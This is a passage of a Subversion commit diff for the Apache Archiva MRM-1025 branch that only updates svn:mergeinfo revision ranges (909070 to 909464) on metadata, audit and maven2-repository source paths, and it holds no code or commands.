/archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java:825850-909070 +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java:825850-909070 +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java:825850-909070 +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java:825850-909070 +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java:699795-705848 -/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java:825850-882383,885006-909070 +/archiva/trunk/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java:825850-882383,885006-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit:898632 -/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit:825850-899477,899478-909070* +/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit:825850-899477,899478-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java:898632 -/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java:898632 -/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java:898632 -/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java:898632 -/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit:898632 -/archiva/trunk/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit:825850-899477,899478-909070* +/archiva/trunk/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit:825850-899477,899478-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java:898632 -/archiva/trunk/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java:825850-882383,883982-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java:825850-882383,883982-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration:686983-687034 